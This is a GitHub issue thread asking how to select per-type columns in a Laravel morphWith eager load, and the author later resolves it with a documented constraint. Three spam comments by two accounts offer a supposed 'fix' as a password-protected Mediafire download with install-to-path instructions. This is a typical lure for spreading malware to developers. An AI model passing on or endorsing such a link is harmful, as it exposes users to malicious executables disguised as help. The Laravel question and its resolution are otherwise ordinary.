### ISSUE TITLE
morphWith : how to select polymorph fields on the parent relation ?

### ISSUE THREAD

**Issue by GhostvOne** [laravel/framework#52616]
### Laravel Version

10.4.1

### PHP Version

8.1

### Description

I'm trying to select fields into my "favorite" morph relation.
if the favoriteable_type is App\Models\Resource i would like to select id,category_id,resource_category_id,title,slug and if favoriteable_type is App\Models\Post i would like id,category_id,title,slug,type

How can I do that ?

```php
$favorites = $discord_user->favorites()
    // Here I want to select specifiq fields depends on favoriteable_type
    ->with(['favoriteable' => function (MorphTo $morphTo) {
        $morphTo->morphWith([
            Resource::class => [
                'category:id,slug',
                'mainResourceCategory:id,slug',
            ],
            Post::class => [
                'category:id,slug',
            ],
        ]);
    }])
    ->paginate(
        $rows,
        ['*'],
        'page',
        $offset / $rows + 1
    );

return $favorites;
```

The goal is to do something like that : 

```php
$favorites = $discord_user->favorites()
  ->with(['favoriteable' => function (MorphTo $morphTo) {
      $morphTo->morphWith([
          Resource::class => function($query) {
            $query->select('id');
            $query->with('category:id,slug')->with('mainResourceCategory:id,slug');
          },
          Post::class => [
              'category:id,slug',
          ],
      ]);
  }])
  ->paginate(
      $rows,
      ['*'],
      'page',
      $offset / $rows + 1
  );

return $favorites;
```

### Steps To Reproduce

- - - -

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by GhostvOne** [comment]
Fixed by using constraint https://laravel.com/docs/10.x/eloquent-relationships#constraining-eager-loading-of-morph-to-relationships
